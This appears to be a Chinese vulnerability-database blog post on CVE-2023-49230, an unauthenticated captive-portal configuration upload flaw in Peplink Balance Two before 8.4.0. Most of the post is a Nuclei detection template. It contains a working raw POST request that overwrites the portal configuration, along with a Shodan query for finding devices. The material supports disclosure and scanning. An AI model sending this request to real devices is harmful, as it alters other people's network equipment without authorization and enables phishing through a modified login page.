Peplink Balance Two Unauthenticated Config Upload Vulnerability

漏洞信息

漏洞名称: Peplink Balance Two Unauthenticated Config Upload Vulnerability

漏洞编号:

  • CVE: CVE-2023-49230

漏洞类型: 未授权访问

漏洞等级: 高危

漏洞描述: Peplink Balance Two是一款广泛使用的网络负载均衡设备,适用于企业级网络环境,提供高可用性和网络流量管理功能。该设备在8.4.0版本之前存在一个未授权访问漏洞,允许攻击者无需认证即可修改设备的captive portal配置。此漏洞的根源在于/guest/portal_admin_upload.cgi接口缺少必要的授权检查,攻击者可以通过上传文件来修改配置,这些更改会反映在/guest/preview.cgi?portal_id=1页面上。由于该漏洞允许未授权的配置修改,攻击者可能利用此漏洞进行恶意配置更改,如修改登录页面信息、插入恶意链接或脚本,从而对用户进行钓鱼攻击或其他恶意活动。此外,由于配置更改可能影响设备的正常运行,攻击者还可能利用此漏洞导致服务中断。此漏洞的CVSS评分为8.8,属于高危漏洞,且由于无需认证即可利用,其潜在危害较大。

产品厂商: peplink

产品名称: balance_two_firmware

影响版本: version < 8.4.0

搜索语法: html:”PEPLINK”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/7959b1e38c293658610f1afb317bdcae8929e4ed/http%2Fcves%2F2023%2FCVE-2023-49230.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95

id: CVE-2023-49230

info:
  name: Peplink Balance Two before 8.4.0 - Unauthenticated Config Upload
  author: srilakivarma
  severity: high
  description: |
    A vulnerability in Peplink Balance Two prior to version 8.4.0 allows unauthenticated attackers to modify captive portal configurations due to a missing authorization check. Specifically, attackers can upload files via /guest/portal_admin_upload.cgi, with the changes reflected at /guest/preview.cgi?portal_id=1.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-49230
    - https://www.synacktiv.com/publications%253Ffield_tags_target_id%253D4
    - https://www.synacktiv.com/sites/default/files/2023-12/synacktiv-peplink-multiple-vulnerabilities.pdf
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-49230
    cwe-id: CWE-862
    epss-score: 0.00091
    epss-percentile: 0.27
    cpe: cpe:2.3:o:peplink:balance_two_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    shodan-query: html:"PEPLINK"
    vendor: peplink
    product: balance_two_firmware
  tags: cve,cve2023,peplink,unauth,intrusive

flow: http(1) && http(2) && http(3)

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/MANGA/index.cgi"

    matchers:
      - type: word
        part: body
        internal: true
        words:
          - 'init_company_name = "Peplink"'

  - raw:
    - |
      POST /guest/portal_admin_upload.cgi HTTP/1.1
      Host: {{Hostname}}
      Content-Type: multipart/form-data; boundary=---------------------------370611892836891531633729116268

      -----------------------------370611892836891531633729116268
      Content-Disposition: form-data; name="option"

      edit_page
      -----------------------------370611892836891531633729116268
      Content-Disposition: form-data; name="mode"

      submit
      -----------------------------370611892836891531633729116268
      Content-Disposition: form-data; name="portal_id"

      1
      -----------------------------370611892836891531633729116268
      Content-Disposition: form-data; name="data"

      {"status":"ok","config":{"login":{"access_mode":"open","message":"","tnc_content":"Terms and Conditions.","tnc_title":"Terms and Conditions","tnc_link":"terms","tnc_prompt":"I agree to #TNC_LINK#","back_login_button":"Back to Login","agree_button":"{{randstr}}","session_id1":" ","session_id2":" "},"common":{"hide_quota":"no","landing_url":"","logo_url":"logo.cgi?portal_id=1&type=preview","logo_url_def":"logo.cgi?default=1","uploaded_logo_size":0,"footer":"Powered by Peplink.","footer_default":"Powered by Peplink."},"success":{},"reach_quota":{},"quota":{"limit":{"data":0,"session_timeout":1800}}}}
      -----------------------------370611892836891531633729116268
      Content-Disposition: form-data; name="logo_action"

      x
      -----------------------------370611892836891531633729116268
      Content-Disposition: form-data; name="logo"; filename=""
      Content-Type: application/octet-stream

      -----------------------------370611892836891531633729116268--

    matchers:
      - type: word
        part: body
        internal: true
        words:
          - '"status": "save_success"'

  - raw:
      - |
        POST /guest/api.cgi HTTP/1.1
        Host: {{Hostname}}

        mode=info&option=preview&portal_id=1

    matchers:
      - type: dsl
        dsl:
          - "contains(body, '{{randstr}}')"
          - 'status_code_2 == 200'


Github Poc
#projectdiscovery/nuclei-templates:github issues #未授权访问
Peplink Balance Two Unauthenticated Config Upload Vulnerability
http://example.com/2025/07/08/github_3792944443/
作者
lianccc
发布于
2025年7月8日
许可协议